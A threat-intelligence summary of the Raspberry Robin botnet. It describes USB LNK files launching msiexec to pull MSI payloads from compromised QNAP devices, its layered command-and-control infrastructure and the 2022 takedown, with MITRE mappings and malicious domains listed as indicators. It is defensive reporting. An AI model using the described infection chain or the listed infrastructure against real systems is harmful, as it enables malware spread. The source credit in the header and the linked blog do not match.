Threat Research

Raspberry Robin’s botnet second life

Securonix

Raspberry Robin is a Pay-Per-Install botnet that spreads via infected USB drives by launching an LNK file to download its MSI payload from compromised QNAP NAS, enabling distribution of other malware and hands-on-keyboard ransomware. The infrastructure is dynamic, using compromised QNAPs and Linode VPS as cascading C2 layers with frequent domain changes, and it may be repurposed by other actors or hijacked to create a β€œsecond life.” hashtags #RaspberryRobin #EvilCorp #SocGholish #Dridex #QNAPWorm

Keypoints

  • Raspberry Robin propagates via infected USB drives; an LNK launches msiexec to download the MSI payload from a compromised QNAP NAS.
  • It employs 14 layers of obfuscation and TOR rendezvous for its communications to stay undetected.
  • The botnet acts as a Pay-Per-Install platform to drop other malware (e.g., SocGholish, Bumblebee, TrueBot, IcedID) and enable hands-on-keyboard ransomware deployment.
  • The infrastructure relies on compromised QNAP devices as first-level C2 validators and Linode VPS as forward proxies, with a large and changing set of domains (270+ known domains by end of 2022).
  • A partial takedown on 26 October 2022 disrupted about 80 domains (roughly 30% of the total), with DNS zones deleted and domain statuses adjusted.
  • The β€œsecond life” risk remains high: msiexec could be hijacked to fetch rogue MSI payloads, with sinkholed domains like tiua.uk and gloa.in illustrating how the threat can be repurposed over time.

MITRE Techniques

  • [T1204] User Execution – Malicious File – The infected device contains an LNK (Windows Shortcut). When the user plugs the thumb drive and launches the LNK which is disguised as a thumb drive or a network share, it will launch the Windows utility msiexec.
  • [T1105] Ingress Tool Transfer – The malware downloads its main component by downloading an MSI from a compromised QNAP instance.
  • [T1027] Obfuscated/Compressed Files and Information – The malware uses 14 layers of obfuscation and TOR rendez-vous for its communications to remain undetected.
  • [T1583] Acquire Infrastructure – The actors retrieved more than 270 domain names by end of 2022 to operate since July 2021.
  • [T1090] Proxy – External Proxy/ Multi-hop – The malware uses TOR rendez-vous for its communications.
  • [T1071.001] Web Protocols – The infrastructure uses domain names as its first C2 level and redirects traffic through proxy layers.

Indicators of Compromise

  • [Domain] tiua.uk – one of the first domains used by Raspberry Robin LNKs to download and execute an MSI payload.
  • [Domain] gloa.in – another early domain used in the infection chain.
  • [Domain] ynns.uk – sinkholed domain that helped identify victims in additional countries.
  • [Domain] myqnapcloud.com – used as part of compromised QNAP C2 infrastructure.
  • [Domain] https://tinyurl.com/mtubjvxr – referenced as a known related domain collection for Raspberry Robin infrastructure.
  • [Port] 20001 – port observed on Linode VPS levels used as part of forward-proxy communications.

Read more: https://blog.sekoia.io/raspberry-robins-botnet-second-life/